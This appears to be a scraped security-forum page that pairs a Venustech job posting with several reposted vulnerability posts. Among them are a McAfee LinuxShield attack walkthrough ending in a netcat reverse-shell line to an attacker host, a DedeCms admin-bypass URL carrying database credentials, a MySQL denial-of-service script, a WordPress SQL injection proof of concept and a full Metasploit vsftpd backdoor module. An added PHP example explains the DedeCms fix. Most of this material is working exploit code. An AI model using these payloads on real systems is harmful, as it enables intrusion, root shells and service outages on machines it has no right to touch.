
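[Recruitment] [Hiring] Venustech (启明星辰) R&D Recruitment

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • QQ:
  • Safety assistant: recruit or job-hunt through 非安全中国 administrators, QQ group: 57116771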


  • ++++++++++ About Venustech ++++++++++

    Just send me a site message.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Develop and maintain software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Expert in C programming
    2. Proficient with the Linux operating system; expert in C programming on Linux
    3. Expert in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis
    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls
    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. System testing and integration testing of products
    2. Writing, executing and revising product test cases
    3. Product performance testing
    4. Support and testing for external projects

    Requirements:

    1. Basic TCP/IP knowledge
    2. Solid data communications fundamentals
    3. Some Linux background
    4. Able to set up and use databases
    5. Familiar with at least one programming language: C/Perl/VBS/TCL
    6. Familiar with test case design, system testing and stress testing
    7. Familiar with firewall principles, with some understanding of firewall features
    8. Some understanding of how network security devices are deployed in a network
    9. Able to use test tools: Loadrunner, packet analysis software, Spirent or IXIA testers

    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Delivering Trojan detection services and web vulnerability scanning services
    2. Technical support for service customers
    3. Research on web page Trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and so on
    4. Routine updates and maintenance of the security event libraries for IDS/IPS/UTM/TDS/WAG/322 and other products
    5. Research on attack techniques, the TCP/IP protocols and reverse engineering

     

    This topic was posted by 小妍.

    McAfee LinuxShield Local/Remote Code Execution Vulnerability
    McAfee LinuxShield remote/local code

    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote exploit: Yes
    Local exploit: Yes

    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-based
    systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0"
              encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteList"
              GlobalVersion="20030131003110" LocalVersion="20091209161903"
              Type="Client"><SiteList Default="1" Name="SomeGUID"><HttpSite
              Type="repository" Name="EvilRepo" Order="1"
              Server="<attackerhost>:80" Enabled="1"
              Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password
              Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888
              nailsd.profile.ODS_99.allFiles=true
              nailsd.profile.ODS_99.childInitTmo=60
              nailsd.profile.ODS_99.cleanChildren=2
              nailsd.profile.ODS_99.cleansPerChild=10000
              nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat
              nailsd.profile.ODS_99.decompArchive=true
              nailsd.profile.ODS_99.decompExe=true
              nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib
              nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
              nailsd.profile.ODS_99.factoryInitTmo=60
              nailsd.profile.ODS_99.heuristicAnalysis=true
              nailsd.profile.ODS_99.macroAnalysis=true
              nailsd.profile.ODS_99.maxQueSize=32
              nailsd.profile.ODS_99.mime=true
              nailsd.profile.ODS_99.noJokes=false
              nailsd.profile.ODS_99.program=true
              nailsd.profile.ODS_99.quarantineChildren=1
              nailsd.profile.ODS_99.quarantineDirectory=/quarantine
              nailsd.profile.ODS_99.quarantinesPerChild=10000
              nailsd.profile.ODS_99.scanChildren=2
              nailsd.profile.ODS_99.scanMaxTmo=301
              nailsd.profile.ODS_99.scanNWFiles=true
              nailsd.profile.ODS_99.scanOnRead=true
              nailsd.profile.ODS_99.scanOnWrite=true
              nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
              nailsd.profile.ODS_99.scansPerChild=10000
              nailsd.profile.ODS_99.slowScanChildren=0
              nailsd.profile.ODS_99.filter.0.type=exclude-path
              nailsd.profile.ODS_99.filter.0.path=/proc
              nailsd.profile.ODS_99.filter.0.subdir=true
              nailsd.profile.ODS_99.filter.extensions.mode=all
              nailsd.profile.ODS_99.filter.extensions.type=extension
              nailsd.profile.ODS_99.action.Default.primary=Clean
              nailsd.profile.ODS_99.action.Default.secondary=Quarantine
              nailsd.profile.ODS_99.action.App.primary=Clean
              nailsd.profile.ODS_99.action.App.secondary=Quarantine
              nailsd.profile.ODS_99.action.timeout=Pass
              nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task
              taskType=On-Demand
              taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false
              timetable=type=unscheduled taskResults=0
              i_lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
                date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
                2010.02.18.
    2010.02.16: Vendor responds that they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
                the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory
    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; follow it for updates.


    Multiple Security Vulnerabilities in the Django Framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Description:

    Django is an open-source web application framework written in Python.
    Django contains multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, or carry out cache poisoning or denial-of-service attacks.
    1) An error in session handling in django.contrib.sessions when a cache backend is used can be exploited to manipulate session information. Successful exploitation requires a known session key and an application that lets the attacker store dictionary-like objects in the cache under a valid session key.
    2) The Django model system includes a field type, URLField, which validates that a supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it attempts to verify and resolve the supplied URL. By default the underlying socket has no timeout, so an attacker can send crafted URLs to consume all server memory, causing a denial of service.
    3) An error in handling redirect responses when verifying URLs supplied to the "URLField" field type lets an attacker return a redirect response pointing to a "file://" URL, making it possible to determine whether local files exist on the server.
    4) An error in handling the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses lets an attacker carry out cache poisoning attacks.

    References:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/

    Step-by-step Linux installation: setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf

    DedeCms (织梦) v5.6-5.7 Unauthorized Access Vulnerability
    http://www.XXXX.com/[DedeCms admin directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current CAPTCHA code and you get straight into the site's admin back end.

    This vulnerability requires knowing the admin back-end path.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);

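Why the key-only loop misses the request shown in the DedeCms post above, as an added example (not DedeCms code and not part of the original post): PHP parses `_POST[GLOBALS][cfg_dbhost]=...` into a nested array whose only top-level key is `_POST`, so only a recursive walk ever sees `GLOBALS` and `cfg_*`. The function names, the three sample query strings and the 192.0.2.10 / example values are constructed for this illustration, and the recursive check returns its findings instead of calling exit() so they can be logged.

```php
<?php
// Added illustration, not DedeCms source code. Parameter names follow the
// request in the post; host and user values are constructed placeholders.
const FORBIDDEN = '#^(cfg_|GLOBALS)#';

// Original check: only the top-level parameter names are inspected.
function topLevelCheckRejects(array $request): bool
{
    foreach ($request as $key => $unused) {
        $key = (string)$key;
        if (strlen($key) > 0 && preg_match(FORBIDDEN, $key) === 1) {
            return true;
        }
    }
    return false;
}

// Replacement check: every nested key and every scalar value is inspected.
// Returns the offending paths so a caller can log them before rejecting.
function recursiveCheckFindings($val, string $path = ''): array
{
    $hits = [];
    if (is_array($val)) {
        foreach ($val as $key => $child) {
            $key = (string)$key;
            $childPath = $path === '' ? $key : $path . '[' . $key . ']';
            if (strlen($key) > 0 && preg_match(FORBIDDEN, $key) === 1) {
                $hits[] = $childPath . ' (key)';
            }
            $hits = array_merge($hits, recursiveCheckFindings($child, $childPath));
        }
        return $hits;
    }
    $val = (string)$val;
    if (strlen($val) > 0 && preg_match(FORBIDDEN, $val) === 1) {
        $hits[] = $path . ' (value)';
    }
    return $hits;
}

// Constructed sample query strings.
$samples = [
    'nested override' => 'dopost=login&userid=admin'
        . '&_POST[GLOBALS][cfg_dbhost]=192.0.2.10'
        . '&_POST[GLOBALS][cfg_dbuser]=example',
    'direct override' => 'dopost=login&cfg_dbhost=192.0.2.10',
    'ordinary login'  => 'dopost=login&userid=admin&validate=abcd',
];

foreach ($samples as $label => $query) {
    // parse_str() builds the same nested arrays PHP builds for $_REQUEST:
    // a[b][c]=v becomes ['a' => ['b' => ['c' => 'v']]].
    parse_str($query, $request);
    printf(
        "%-16s top-level check rejects: %-3s | recursive check flags: %s\n",
        $label,
        topLevelCheckRejects($request) ? 'yes' : 'no',
        implode(', ', recursiveCheckFindings($request)) ?: 'nothing'
    );
}
```

The same recursive walk is useful in log review: any request whose nested keys reach `GLOBALS` or `cfg_` under a `_POST`, `_GET` or `_COOKIE` parameter is worth flagging even on a patched site.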

    Step-by-step Linux installation: setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf

    MySQL 5.5.8 Remote Denial of Service Vulnerability

    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    buf2=("\x11\x00\x00\x00\x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"

    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "\n[*] Connect"
        s.send(buf)
        print "\n[*] Payload 1 sent"
        s.send(buf2)
        print "\n[*] Payload 2 sent\n", "\n[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()

    WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability

    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429


    VSFTPD v2.3.4 Backdoor Command Execution Vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5' ],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end